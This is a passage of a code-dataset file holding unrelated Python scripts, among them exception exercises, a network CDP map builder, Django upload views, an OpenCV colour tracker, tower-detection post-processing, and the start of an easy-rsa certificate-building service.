\"+results[\"Filename\"][result]+\" City/\")\n else:\n os.system(\"mv \"+results[\"Filename\"][result]+\" Astronomical/\")\n\n\n\n\n","sub_path":"testing_with_mfr.py","file_name":"testing_with_mfr.py","file_ext":"py","file_size_in_byte":2936,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"594146195","text":"def divide(dividend, divisor):\n if divisor == 0:\n raise ZeroDivisionError(\"Divisor cannot be 0.\")\n\n return dividend / divisor\n\ngrades = []\n\nprint(\"Welcome to the average grade program.\")\ntry:\n average = divide(sum(grades), len(grades))\n print(f\"The average grade is {average}.\")\nexcept ZeroDivisionError as e:\n print(\"There are no grades yet in your list.\")\n\n\nstudents = [\n {\"name\": \"Bob\", \"grades\": [75,90]},\n {\"name\": \"Rolf\", \"grades\": [3,40]},\n {\"name\": \"Jen\", \"grades\": [100,90]}\n]\n\ntry:\n for student in students:\n name = student[\"name\"]\n grades = student[\"grades\"]\n average = divide(sum(grades), len(grades))\n print(f\"{name} averaged {average}.\")\nexcept ZeroDivisionError:\n print(f\"ERROR: {name} has no grades!\")\nelse:\n print(\"-- All student averages calculated --\")\nfinally:\n print(\"-- End of student average calculation --\")\n\nclass TooManyPagesReadError(ValueError):\n pass\n\n\nclass Book:\n def __init__(self, name: str, page_count:int):\n self.name = name\n self.page_count = page_count\n self.pages_read = 0\n\n def __repr__(self):\n return(\n f\"\"\n )\n\n def read(self, pages:int):\n if self.pages_read + pages > self.page_count:\n raise TooManyPagesReadError(\n f\"You tried to read {self.pages_read + pages} pages, but this book only has {self.page_count} pages.\"\n )\n self.pages_read += pages\n print (f\"You have now read {self.pages_read} pages out of {self.page_count}\")\n\npython101 = Book(\"Python 101\", 50)\npython101.read(35)\npython101.read(50)","sub_path":"exercise44_errors.py","file_name":"exercise44_errors.py","file_ext":"py","file_size_in_byte":1700,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"540090738","text":"class Tree:\n def __init__(self, val=None):\n self.val = val\n self.right = None\n self.left = None\n\n def add(self, val):\n if self.val is None:\n self.val = val\n elif val > self.val:\n if self.right is None:\n self.right = Tree(val)\n else:\n self.right.add(val)\n else:\n if self.left is None:\n self.left = Tree(val)\n else:\n self.left.add(val)\n\n\nn_test, layers = map(int, input().split())\nshapes = set()\nfor i in range(n_test):\n tr = Tree()\n for val in list(map(int,input().split())):\n tr.add(val)\n q = [tr]\n string = str()\n while len(q):\n node = q.pop()\n string += 'l' if node.left else 'n'\n string += 'r' if node.right else 'n'\n if node.left:\n q.append(node.left)\n if node.right:\n q.append(node.right)\n shapes.add(string)\nprint(len(shapes))\n\n","sub_path":"ceiling function_2.py","file_name":"ceiling function_2.py","file_ext":"py","file_size_in_byte":979,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"89676652","text":"import sqlite3\r\nfrom pprint import pprint\r\nfrom common_functions import *\r\nfrom cdp_work import *\r\nfrom yed_work import *\r\nimport random\r\n\r\n\r\nmap_name = \"RH 6.graphml\"\r\n\r\ndef do_i_want_this(host):\r\n\ti_want_these = [\r\n\t\"peb_4506_06\",\r\n\t]\r\n\tfor i_want in i_want_these:\r\n\t\tif i_want in host:\r\n\t\t\treturn True\r\n\treturn False\r\n\r\n\r\nconnected_hosts = []\r\ndef it_is_dupe(existing_conns, this_connectoin):\r\n if this_connection in existing_conns:\r\n return True\r\n swapped_direction = {}\r\n swapped_direction[\"local_interface\"] =this_connectoin[\"remote_interface\"]\r\n swapped_direction[\"remote_interface\"] =this_connectoin[\"local_interface\"]\r\n swapped_direction[\"origin_host\"] =this_connectoin[\"other_host\"]\r\n swapped_direction[\"other_host\"] =this_connectoin[\"origin_host\"]\r\n if swapped_direction in existing_conns:\r\n return True\r\n else:\r\n return False\r\n\r\n\r\ndef sanatize_hostname(host):\r\n\tbad_charicters = [\"&\"]\r\n\r\n\tfor bad_char in bad_charicters:\r\n\t\tif bad_char in host:\r\n\t\t\tprint (host)\r\n\t\t\thost = host.replace(bad_char,\"\")\r\n\treturn host\r\n\r\n\r\ndef pull_ips_from_running_config(running):\r\n\trunning = running.split(\"\\n\")\r\n\tlocal_ips=[]\r\n\tip_lines = find_child_text (running, \"ip address\")\r\n\tfor ip_line in ip_lines:\r\n\t\tfor each_line in ip_line:\r\n\t\t\t#print (each_line)\r\n\t\t\ttry:\r\n\t\t\t\tlocal_ips.append(get_ip(each_line)[0])\r\n\t\t\texcept:\r\n\t\t\t\tfor ip in get_ip(each_line):\r\n\t\t\t\t\tlocal_ips.append(ip)\r\n\treturn (local_ips)\r\n\r\ndef pull_count(db_name):\r\n\tconn = sqlite3.connect(db_name)\r\n\tcur = conn.cursor()\r\n\tcommand =\"\"\"select count(site_name) from devices;\r\n\t\"\"\"\r\n\toutput = cur.execute(command)\r\n\treturn output\r\n\r\n\r\ndef pull_cdp_info(db_name):\r\n\tconn = sqlite3.connect(db_name)\r\n\tcur = conn.cursor()\r\n\tcommand =\"\"\" select site_name,CDP_nei from devices;\"\"\"\r\n\toutput = cur.execute(command)\r\n\treturn output\r\n\r\n\r\ndef put_in_xml_start(map):\r\n\tmap = map_start\r\n\treturn map\r\n\r\n\r\n\r\n#def dont_put_this_in_map(hostname):\r\n#\tbad_hostnames = [\"SEP\"]\r\n#\tfor bad_host in bad_hostnames:\r\n#\t\tif bad_host in hostname:\r\n#\t\t\treturn True\r\n#\treturn False\r\n\r\ndef put_in_nodes(hosts,node ):\r\n\tmap = ''\r\n\tfor host in hosts:\r\n\t\tif is_it_a_phone(host) == True:\r\n\t\t\tcontinue\r\n\r\n\r\n\t\thost = sanatize_hostname(host)\r\n\t\tmap = map +node.format(host, host, \"rectangle\")\r\n\treturn map\r\n\r\ndef put_in_connections(map,connections_data,link):\r\n\tmap = \"\"\r\n\tkeys = []\r\n\tfor connection in connections_data:\r\n\t\t# #ID,Source, Target, description, description\r\n\t\tif is_it_a_phone(connection['origin_host']) == True:\r\n\t\t\tcontinue\r\n\t\tif is_it_a_phone(connection['other_host']) == True:\r\n\t\t\tcontinue\r\n\r\n\r\n\t\tif connection['origin_host'] not in connected_hosts:\r\n\t\t\tconnected_hosts.append(connection['origin_host'])\r\n\t\tif \tconnection['other_host'] not in connected_hosts:\r\n\t\t\tconnected_hosts.append(connection['other_host'])\r\n\r\n\t\tconnection['origin_host'] = sanatize_hostname(connection['origin_host'])\r\n\t\tconnection['other_host'] = sanatize_hostname(connection['other_host'])\r\n\t\tid = 10\r\n\r\n\t\tnew_id_needed = True\r\n\t\twhile new_id_needed == True:\r\n\t\t\tid = str(random.randint(1, 100000000))\r\n\t\t\tif id not in keys:\r\n\t\t\t\tkeys.append(id)\r\n\t\t\t\tnew_id_needed = False\r\n\r\n\t\tdescription = str(connection['local_interface'])+\" \"+str(connection['remote_interface'])\r\n\t\tmap = map+link.format(id,connection['origin_host'],connection['other_host'],description,description)\r\n\treturn map\r\n\r\n\r\n\r\n\r\ndb_name = 'Network_info.db'\r\n\r\nconnections = []\r\npprint (\"Pulling CDP data from database\")\r\nprint (get_time())\r\nprint (\"\\n\")\r\nall_cpd_data = pull_cdp_info(db_name)\r\npprint (\"Parsing CDP Data\")\r\nprint (get_time())\r\nprint (\"\\n\")\r\nfor tmp_site_cdp_data in all_cpd_data:\r\n\thostname = tmp_site_cdp_data[0]\r\n\tsite_cdp_data= tmp_site_cdp_data[1]\r\n\tcdp_neigh_data = cdpNeighbors(site_cdp_data)\r\n\t#print (hostname)\r\n\t#pprint(cdp_neigh_data)\r\n\tfor each in cdp_neigh_data:\r\n\t\t#pprint (each)\r\n\t\tconnections.append([hostname,each])\r\n\t#print (\"\\n\\n\\n\\n\\n\\n\\n\")\r\n\r\nprint (\"Building connection list\")\r\nprint (get_time())\r\nprint (\"\\n\")\r\nconnections_data = []\r\nfor each in connections:\r\n\ti_want = False\r\n\tthis_connection = {}\r\n\tthis_connection['origin_host'] = each[0]\r\n\tif do_i_want_this(this_connection['origin_host']) == True:\r\n\t\ti_want = True\r\n\tcdp_data = each[1]\r\n\tthis_connection['other_host'] = cdp_data[\"deviceId\"]\r\n\tif do_i_want_this(this_connection['other_host']) == True:\r\n\t\ti_want = True\r\n\tif i_want == False:\r\n\t\tcontinue\r\n\tthis_connection['other_host'] = remove_end(this_connection['other_host'],\"\\.\")\r\n\tthis_connection['local_interface'] = cdp_data[\"localInterface\"]\r\n\tthis_connection['remote_interface'] = cdp_data[\"interface\"]\r\n\tif len(connections_data) == 0:\r\n\t\tconnections_data.append(this_connection)\r\n\telse:\r\n\t\tif it_is_dupe(connections_data, this_connection) == False:\r\n\t\t\tconnections_data.append(this_connection)\r\n\r\n\r\nhosts = []\r\nprint (\"Building host list\")\r\nprint (get_time())\r\nprint (\"\\n\")\r\nfor this_connection in connections_data:\r\n#\tprint (this_connection)\r\n#\tprint (len(hosts))\r\n\tif this_connection['origin_host'] not in hosts:\r\n\t\thosts.append(this_connection['origin_host'])\r\n\tif this_connection['other_host'] not in hosts:\r\n\t\thosts.append(this_connection['other_host'])\r\n\t\t\r\n#pprint (hosts)\r\n#print (len(hosts))\r\n\r\npprint (\"putting in connections\")\r\nprint (get_time())\r\nprint (\"\\n\")\r\nconnections = put_in_connections(map,connections_data,link)\r\n\r\n\r\n\r\nprint (\"Making the map.\")\r\nprint (get_time())\r\nprint (\"\\n\")\r\nmap = \"\"\r\n\r\nmap = put_in_xml_start (map)\r\npprint (\"putting in nodes\")\r\nprint (get_time())\r\nprint (\"\\n\")\r\nnodes = put_in_nodes(connected_hosts,node )\r\n\r\n\r\n\r\nmap = put_in_xml_start (map)+nodes+connections+map_end\r\n\r\n\r\nprint (\"Writting map to drive\")\r\nprint (get_time())\r\nprint (\"\\n\")\r\nto_doc_w(map_name,map)\r\nprint (\"Done\")\r\nprint (get_time())\r\nprint (\"\\n\")\r\n\r\n\r\npprint (connected_hosts)","sub_path":"Build physical connection small map.py","file_name":"Build physical connection small map.py","file_ext":"py","file_size_in_byte":5784,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"546460453","text":"from django.shortcuts import render, redirect\nfrom django.conf import settings\nfrom django.core.files.storage import FileSystemStorage\n\nfrom uploads.core.models import Document\nfrom uploads.core.forms import DocumentForm\nfrom django.http import JsonResponse\nfrom django.core import serializers\n\nimport json\nimport random\nimport pandas as pd\n\n\n\ndef home(request):\n documents = Document.objects.all()\n return render(request, 'core/home.html', { 'documents': documents })\n\n\ndef simple_upload(request):\n if request.method == 'POST' and request.FILES['myfile']:\n myfile = request.FILES['myfile']\n fs = FileSystemStorage()\n filename = fs.save(myfile.name, myfile)\n uploaded_file_url = fs.url(filename)\n return render(request, 'core/simple_upload.html', {\n 'uploaded_file_url': uploaded_file_url\n })\n return render(request, 'core/simple_upload.html')\n\n\ndef model_form_upload(request):\n if request.method == 'POST':\n form = DocumentForm(request.POST, request.FILES)\n if form.is_valid():\n form.save()\n return redirect('home')\n else:\n form = DocumentForm()\n return render(request, 'core/model_form_upload.html', {\n 'form': form\n })\n\ndef d3_data(request):\n #data = [50,100,150,200,250,130,210]\n data = random.sample(range(50, 300), 20)\n data_json= json.dumps(data)\n return render(request, 'core/d3Chart.html',{\"data_json\" : data_json})\n\ndef chordPlot(request):\n ChordData = [[11975, 5871, 8916, 2868],[ 1951, 10048, 2060, 6171],[ 8010, 16145, 8090, 8045],[ 1013, 990, 940, 6907]]\n #ChordData = [150,100,75,50,100,150,200,250,130,210]\n ChordData_json= json.dumps(ChordData)\n return render(request, 'core/chordDiagrame.html',{\"ChordData_json\" : ChordData_json})\n\n\ndef simple_upload(request):\n if request.method == 'POST' and request.FILES['myfile']:\n myfile = request.FILES['myfile']\n df = pd.read_csv(myfile)\n matrix = df.values.tolist()\n matrix_json = json.dumps(matrix)\n return render(request, 'core/chordDiagrame.html', {\n 'matrix_json': matrix_json\n })\n return render(request, 'core/simple_upload.html')\n\ndef Ichord(request):\n if request.method == 'POST' and request.FILES['myfile']:\n myfile = request.FILES['myfile']\n df = pd.read_csv(myfile)\n df1 = pd.DataFrame({\"name\": df.columns, \"color\": randomColor(len(df.columns))})\n names = [{k: df1.values[i][v] for v, k in enumerate(df1.columns)} for i in range(len(df1))]\n #names = list(df.columns)\n names_json = json.dumps(names,ensure_ascii= False).encode('utf8')\n\n matrix = df.values.tolist()\n matrix_json = json.dumps(matrix)\n return render(request, 'core/IntChord.html', {\n 'matrix_json': matrix_json,\n 'names_json': names_json\n })\n return render(request, 'core/simple_upload.html')\n\n\ndef randomColor(n):\n color = [\"#\"+''.join([random.choice('0123456789ABCDEF') for j in range(6)])\n for i in range(n)]\n return color\n\n#clist = [\"#000000\",\"#800000\",\"#008000\",\"#808000\",\"#000080\",\"#800080\",\"#008080\",\"#c0c0c0\",\"#808080\",\"#ff0000\",\"#00ff00\",\"#ffff00\",\"#0000ff\",\"#ff00ff\",\"#00ffff\",\"#ffaf00\",\"#ffd7d7\",\"#d1fde9\",\"#B10DC9\",\"#FF4136\",\"#4f45c0\",\"#ffff66\",\"#c4c1ea\",\"#00cccc\",\"#7c9d45\",\"#57389f\"]\n#color= random.sample(clist, 15)","sub_path":"uploads/core/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":3403,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"143956841","text":"# a^b (modulo c)\n# https://discuss.codechef.com/questions/20451/a-tutorial-on-fast-modulo-multiplication-exponential-squaring\ndef exponent(a,b,c):\n\tresult=1\n\tp=a\n\twhile b>0:\n\t\tif(b%2 == 1):\n\t\t\tresult=(result*p)%c\n\t\tp=(p*p)%c\n\t\tb=b/2\n\treturn result\n","sub_path":"Python/fast-modulo-exponentiation.py","file_name":"fast-modulo-exponentiation.py","file_ext":"py","file_size_in_byte":248,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"364525387","text":"import torch\n\nfrom recsys_metrics.precision import precision\nfrom torchmetrics.functional import retrieval_precision\n\nfrom benchmark.benchmark import benchmark, benchmark_batch, sanity_check\n\n\n# ns = [128, 256, 512, 1024, 2048, 4096]\n# ks = [1, 50, 100]\ndef bench_precision_single(ns, ks, number=10_000, seed=42):\n def init_callback(n, k):\n torch.manual_seed(seed)\n preds = torch.rand(n)\n target = torch.randint(0, 2, size=(n,))\n return preds, target\n\n def base_callback(n, k, init_out):\n preds, target = init_out\n return retrieval_precision(preds, target, k=k)\n\n def our_callback(n, k, init_out):\n preds, target = init_out\n return precision(preds, target, k=k, reduction='mean')\n\n sanity_check(ns[-1], ks[-1], init_callback, base_callback, our_callback)\n\n df, g = benchmark(ns, ks, init_callback, base_callback, our_callback, number=number)\n g.fig.subplots_adjust(top=.88)\n g.fig.suptitle('Benchmark - Single Example: Precision', fontsize=16)\n return df, g\n\n# n=512,\n# k=50,\n# batch_sizes=[32, 64, 128, 256, 512],\ndef bench_precision_batch(n, k, batch_sizes, number=1_000, seed=42):\n def init_callback(n, k, batch_size):\n torch.manual_seed(seed)\n preds = torch.rand(batch_size, n)\n target = torch.randint(0, 2, size=(batch_size, n))\n return preds, target\n\n def base_callback(n, k, init_out):\n preds, target = init_out\n out = torch.stack([\n retrieval_precision(_preds, _target, k=k)\n for _preds, _target in zip(preds, target)\n ]).mean(0)\n return out\n\n def our_callback(n, k, init_out):\n preds, target = init_out\n return precision(preds, target, k=k, reduction='mean')\n\n df, g = benchmark_batch(\n n=n,\n k=k,\n batch_sizes=batch_sizes,\n init_callback=init_callback,\n base_callback=base_callback,\n our_callback=our_callback,\n number=number\n )\n g.fig.subplots_adjust(top=.88)\n g.fig.suptitle('Benchmark - Mini-Batch: Precision', fontsize=16)\n return df, g\n","sub_path":"benchmark/precision.py","file_name":"precision.py","file_ext":"py","file_size_in_byte":2096,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"312669051","text":"import numpy as np\nimport cv2\nimport math\n\ncam = cv2.VideoCapture(0)\n\ndef empty():\n pass\n\ncv2.namedWindow(\"HSV\")\ncv2.resizeWindow(\"HSV\",640,240)\ncv2.createTrackbar(\"Hue Min\", \"HSV\", 0, 179, empty)\ncv2.createTrackbar(\"Hue Max\", \"HSV\", 0, 179, empty)\ncv2.createTrackbar(\"Sat Min\", \"HSV\", 0, 255, empty)\ncv2.createTrackbar(\"Sat Max\", \"HSV\", 255, 255, empty)\ncv2.createTrackbar(\"Val Min\", \"HSV\", 0, 255, empty)\ncv2.createTrackbar(\"Val Max\", \"HSV\", 255, 255, empty)\n\ncv2.namedWindow(\"Trackbars\")\nhh='Max'\nhl='Min'\nwnd = 'Colorbars'\n\n\nwhile True:\n _, imgFrame = cam.read()\n hueF = cv2.cvtColor(imgFrame, cv2.COLOR_BGR2HSV)\n # EXIT\n\n h_min = cv2.getTrackbarPos(\"Hue Min\", \"HSV\")\n h_max = cv2.getTrackbarPos(\"Hue Max\", \"HSV\")\n s_min = cv2.getTrackbarPos(\"Sat Min\", \"HSV\")\n s_max = cv2.getTrackbarPos(\"Sat Max\", \"HSV\")\n v_min = cv2.getTrackbarPos(\"Val Min\", \"HSV\")\n v_max = cv2.getTrackbarPos(\"Val Max\", \"HSV\")\n\n lower = np.array([h_min, s_min, v_min], np.uint8)\n upper = np.array([h_max, s_max, v_max], np.uint8)\n mask = cv2.inRange(hueF, lower, upper)\n kernal = np.ones((5, 5), \"uint8\")\n\n mask2 = cv2.dilate(mask, kernal)\n res = cv2.bitwise_and(imgFrame, imgFrame, mask=mask2)\n\n # # Define the red threshold & apply mask\n # redLow = np.array([136, 87, 111], np.uint8)\n # redHigh = np.array([180, 255, 255], np.uint8)\n # redMask = cv2.inRange(hueF, redLow, redHigh)\n\n cv2.imshow(\"orig\", imgFrame)\n #cv2.imshow(\"hsv\", hueF)\n #cv2.imshow(\"mask\", mask2)\n cv2.imshow(\"res\", res)\n\n contours, hierarchy = cv2.findContours(mask2, cv2.RETR_TREE, cv2.CHAIN_APPROX_SIMPLE)\n\n # detect red\n for pic, contour in enumerate(contours):\n area = cv2.contourArea(contour)\n #\n # if (area > 300):\n # x, y, w, h = cv2.boundingRect(contour)\n # imgFrame = cv2.rectangle(imgFrame, (x, y), (x + w, y + h), (0, 0, 255), 2)\n #\n # cv2.putText(imgFrame, \"Color\", (x, y), cv2.FONT_HERSHEY_SIMPLEX, 1.0, (0, 0, 255))\n\n M = cv2.moments(contour)\n\n if M[\"m00\"] > 0:\n cX = int(M[\"m10\"] / M[\"m00\"])\n cY = int(M[\"m01\"] / M[\"m00\"])\n\n # Use contour if size is bigger then 1000 and smaller then 50000\n if area > 1000:\n if area < 50000:\n x, y, w, h = cv2.boundingRect(contour)\n approx = cv2.approxPolyDP(contour, 0.001 * cv2.arcLength(contour, True), True)\n # draw contour\n cv2.drawContours(imgFrame, contour, -1, (0, 255, 0), 3)\n # draw circle on center of contour\n # cv2.circle(imgFrame, (cX, cY), 7, (255, 255, 255), -1)\n # perimeter = cv2.arcLength(contour, True)\n # approx = cv2.approxPolyDP(contour, 0.04 * perimeter, True)\n # # fit elipse\n # _, _, angle = cv2.fitEllipse(contour)\n # P1x = cX\n # P1y = cY\n # length = 35\n #\n # # calculate vector line at angle of bounding box\n # P2x = int(P1x + length * math.cos(math.radians(angle)))\n # P2y = int(P1y + length * math.sin(math.radians(angle)))\n # # draw vector line\n # cv2.line(imgFrame, (cX, cY), (P2x, P2y), (255, 255, 255), 5)\n #\n # # output center of contour\n # print(angle)\n\n # detect bounding box\n rect = cv2.minAreaRect(contour)\n box = cv2.boxPoints(rect)\n box = np.int0(box)\n # draw bounding box\n cv2.drawContours(imgFrame, [box], 0, (0, 0, 255), 2)\n cv2.putText(imgFrame, \"Points: \" + str((x, y)), (x + w + 20, y + 20),\n cv2.FONT_HERSHEY_COMPLEX, 0.7, (0, 255, 0), 2)\n\n # EXIT\n cv2.imshow(\"multiple colors\", imgFrame)\n if cv2.waitKey(10) & 0xFF == ord('q'):\n cap.release()\n cv2.destroyAllWindows()\n break","sub_path":"tag-bot-main/FINAL_CODE/PyCVCode/Final/ColorTest.py","file_name":"ColorTest.py","file_ext":"py","file_size_in_byte":4013,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"401686101","text":"import os\nimport scipy.misc\nimport sis_utils\nimport ersa_utils\nfrom rst_utils import misc_utils\nfrom evaluate_utils import local_maxima_suppression\nfrom post_processing_utils import get_edge_info, connect_lines, prune_lines, prune_towers, \\\n visualize_results, towers_online, linked_length, break_lines, get_samples_between, load_model, \\\n run_inference_for_single_image, get_tower_truth_pred, update_connected_pairs\n\ncity_list = ['AZ_Tucson', 'KS_Colwich_Maize', 'NC_Clyde', 'NC_Wilmington']\n\n\ndef load_data(dirs, model_name, city_id, tile_id, merge_range=100):\n conf_dict = {0: 2, 1: 1, 2: 0, 3: 3}\n pred_file_name = os.path.join(dirs['task'], model_name + '_v2', 'USA_{}_{}.txt'.format(city_list[city_id], tile_id))\n preds = ersa_utils.load_file(pred_file_name)\n raw_rgb = ersa_utils.load_file(os.path.join(dirs['raw'], 'USA_{}_{}.tif'.format(city_list[city_id], tile_id)))\n conf_img = ersa_utils.load_file(os.path.join(dirs['conf'].format(conf_dict[city_id]),\n '{}{}.png'.format(city_list[city_id].split('_')[1], tile_id)))\n line_gt = ersa_utils.load_file(os.path.join(dirs['line'], '{}{}_GT.png'.format(city_list[city_id].split('_')[1],\n tile_id)))\n tower_gt = get_tower_truth_pred(dirs, city_id, tile_id)\n tower_pred, tower_conf, _ = local_maxima_suppression(preds, th=merge_range)\n conf_img = scipy.misc.imresize(conf_img, line_gt.shape)\n return preds, raw_rgb, conf_img, line_gt, tower_gt, tower_pred, tower_conf\n\n\nif __name__ == '__main__':\n # directories\n img_dir, task_dir = sis_utils.get_task_img_folder()\n ersa_utils.make_dir_if_not_exist(os.path.join(img_dir, 'new_annotation'))\n dirs = {\n 'task': task_dir,\n 'image': os.path.join(img_dir, 'new_annotation'),\n 'raw': r'/home/lab/Documents/bohao/data/transmission_line/raw2',\n 'conf': r'/media/ei-edl01/user/bh163/tasks/2018.11.16.transmission_line/confmap_uab_UnetCrop_linesv3_city0_'\n r'pw50_0_PS(572, 572)_BS5_EP100_LR0.0001_DS80_DR0.1_SFN32',\n 'line': r'/media/ei-edl01/data/uab_datasets/lines_v3/data/Original_Tiles'\n }\n\n # settings\n merge_range = 100\n radius = [1500]\n width = 5\n th = 8\n step = 5\n patch_size = (500, 500)\n for model_name in ['faster_rcnn']:\n model_list_1 = [\n '{}_Tucson_2019-06-30_12-51-03'.format(model_name),\n '{}_Colwich_2019-07-01_10-47-22'.format(model_name),\n '{}_NZ_2019-07-01_18-33-39'.format(model_name),\n ]\n\n model_list_2 = [\n '{}_Tucson_2019-07-03_00-05-04'.format(model_name),\n '{}_Colwich_2019-07-03_00-04-11'.format(model_name),\n '{}_NZ_2019-07-01_18-33-39'.format(model_name),\n ]\n\n model_list_3 = [\n '{}_Tucson_2019-07-02_14-53-17'.format(model_name),\n '{}_Colwich_2019-07-02_18-10-38'.format(model_name),\n '{}_NZ_2019-07-01_18-33-39'.format(model_name),\n ]\n\n if model_name == 'faster_rcnn':\n model_list = model_list_1\n elif model_name == 'faster_rcnn_res101':\n model_list = model_list_2\n elif model_name == 'faster_rcnn_res50':\n model_list = model_list_3\n\n '''model_list = [\n '{}_2019-02-12_09-30-35'.format(model_name),\n '{}_2019-02-12_09-33-08'.format(model_name),\n '{}_2019-02-12_09-34-45'.format(model_name),\n '{}_2019-02-12_09-36-15'.format(model_name),\n ]'''\n '''model_list = [\n '{}_2019-02-12_09-30-35'.format(model_name),\n '{}_2019-02-12_09-33-08'.format(model_name),\n '{}_2019-02-12_09-34-45'.format(model_name),\n '{}_2019-02-12_09-36-15'.format(model_name),\n ]'''\n model_id = 25000\n gpu = 1\n\n for city_id in range(2):\n detection_graph, category_index = load_model(model_list[city_id], model_id, gpu)\n for tile_id in [1, 2, 3]:\n print('Evaluating city {} tile {}'.format(city_id, tile_id))\n\n # load data\n preds, raw_rgb, conf_img, line_gt, tower_gt, tower_pred, tower_conf = \\\n load_data(dirs, model_name, city_id, tile_id, merge_range=merge_range)\n\n # get line confidences\n connected_pairs, connected_towers, unconnected_towers = None, None, None\n for r in radius:\n tower_pairs, tower_dists, line_confs = \\\n get_edge_info(tower_pred, conf_img, radius=r, width=width,\n tile_min=(0, 0), tile_max=raw_rgb.shape)\n\n # connect lines\n connected_pairs = connect_lines(tower_pairs, line_confs, th, cut_n=2)\n connected_pairs, unconnected_pairs = prune_lines(connected_pairs, tower_pred)\n\n # get towers that are not connected\n connected_towers, unconnected_towers = prune_towers(connected_pairs, tower_pred)\n\n # search line\n try:\n connected_towers, unconnected_towers, connected_pairs = \\\n towers_online(tower_pred, connected_towers, unconnected_towers, connected_pairs)\n except ValueError:\n pass\n\n # update towers\n break_lines(connected_pairs, tower_pred)\n # tower_pred = [tower_pred[a] for a in connected_towers]\n # tower_conf = [tower_conf[a] for a in connected_towers]\n\n # check the connection length\n line_length_list, attention_pair = linked_length(tower_pred, connected_pairs, dirs, city_id, tile_id)\n for ap in attention_pair:\n pred = []\n for sample_patch, top_left in get_samples_between(raw_rgb, tower_pred[ap[0]], tower_pred[ap[1]], step, patch_size):\n # Actual detection.\n output_dict = run_inference_for_single_image(sample_patch, detection_graph)\n\n for db, dc, ds in zip(output_dict['detection_boxes'], output_dict['detection_classes'],\n output_dict['detection_scores']):\n left = int(db[1] * patch_size[1]) + top_left[1]\n top = int(db[0] * patch_size[0]) + top_left[0]\n right = int(db[3] * patch_size[1]) + top_left[1]\n bottom = int(db[2] * patch_size[0]) + top_left[0]\n confidence = ds\n class_name = category_index[dc]['name']\n if confidence > 0.5:\n pred.append('{} {} {} {} {} {}\\n'.format(class_name, confidence, left, top, right, bottom))\n center_list, conf_list, _ = local_maxima_suppression(pred, th=20)\n tower_pred.extend(center_list)\n tower_conf.extend(conf_list)\n\n tower_pairs, tower_dists, line_confs = \\\n get_edge_info(tower_pred, conf_img, radius=radius[-1], width=width,\n tile_min=(0, 0), tile_max=raw_rgb.shape)\n\n # connect lines\n connected_pairs = connect_lines(tower_pairs, line_confs, th, cut_n=2)\n connected_pairs, unconnected_pairs = prune_lines(connected_pairs, tower_pred)\n\n # get towers that are not connected\n connected_towers, unconnected_towers = prune_towers(connected_pairs, tower_pred)\n\n # search line\n try:\n connected_towers, unconnected_towers, connected_pairs = \\\n towers_online(tower_pred, connected_towers, unconnected_towers, connected_pairs)\n except ValueError:\n pass\n\n # update towers\n '''break_lines(connected_pairs, tower_pred)\n connected_pairs = update_connected_pairs(connected_pairs, tower_pred, connected_towers)\n tower_pred = [tower_pred[a] for a in connected_towers]\n tower_conf = [tower_conf[a] for a in connected_towers]\n\n assert len(tower_pred) == len(tower_conf)\n save_file_name = os.path.join(task_dir, 'post_{}_{}_{}_pred_v2.npy'.format(model_name, city_id, tile_id))\n misc_utils.save_file(save_file_name, tower_pred)\n save_file_name = os.path.join(task_dir, 'post_{}_{}_{}_conf_v2.npy'.format(model_name, city_id, tile_id))\n misc_utils.save_file(save_file_name, tower_conf)\n save_file_name = os.path.join(task_dir, 'post_{}_{}_{}_conn_v2.npy'.format(model_name, city_id, tile_id))\n misc_utils.save_file(save_file_name, connected_pairs)'''\n\n # visualize results\n visualize_results(dirs['image'], city_id, tile_id, raw_rgb, line_gt, tower_pred, tower_gt, connected_pairs,\n connected_towers, unconnected_towers, save_fig=True, post_str='_{}'.format(model_name), close_file=True)\n","sub_path":"]tasks/2019.02.11.tower_evaluate/iterative_post_processing_v2.py","file_name":"iterative_post_processing_v2.py","file_ext":"py","file_size_in_byte":9306,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"76800095","text":"import os, sys\nimport pexpect\nimport threading\nimport time\nimport subprocess\nfrom bson.objectid import ObjectId\nfrom pathlib import Path\nfrom flask import request, send_from_directory\nfrom flask_restplus import Resource\n\nfrom app.main.model.database import *\nfrom ..util.dto import CertDto\nfrom ..util.errors import *\nfrom ..config import get_config\n\napi = CertDto.api\ncert_key = CertDto.cert_key\n\nUPLOAD_DIR = Path(get_config().UPLOAD_ROOT)\n\nif os.name == 'nt':\n EASY_RSA_PATH = Path('..') / 'easy-rsa' / 'Windows'\n KEYS_PATH = EASY_RSA_PATH / 'keys'\n LINE_BEGIN = ''\n LINE_END = os.linesep * 2\nelif os.name == 'posix':\n EASY_RSA_PATH = Path('..') / 'easy-rsa' / 'Linux'\n KEYS_PATH = EASY_RSA_PATH / 'keys'\n LINE_BEGIN = './'\n LINE_END = os.linesep\nelse:\n print('Unsupported platform')\n sys.exit(1)\n\ndef is_file_valid(file):\n return os.path.exists(file) and os.path.getsize(file) > 0\n\ndef get_pexpect_child():\n if os.name == 'nt':\n from pexpect import popen_spawn\n\n shell = 'cmd.exe'\n child = popen_spawn.PopenSpawn(shell)\n child.expect('>')\n child.sendline('chcp 65001')\n child.expect(LINE_END)\n elif os.name == 'posix':\n shell = '/bin/bash'\n child = pexpect.spawn(shell)\n\n return child\n\nclass build_keys(threading.Thread):\n def __init__(self):\n threading.Thread.__init__(self)\n\n def run(self):\n if not is_file_valid(KEYS_PATH / 'ca.key') or not is_file_valid(KEYS_PATH / 'ca.crt'):\n print('Start to build CA key')\n start = time.time()\n child = get_pexpect_child()\n child.sendline('cd {}'.format(EASY_RSA_PATH))\n child.expect(LINE_END)\n\n if os.name == 'nt':\n child.sendline(LINE_BEGIN + 'vars')\n elif os.name == 'posix':\n 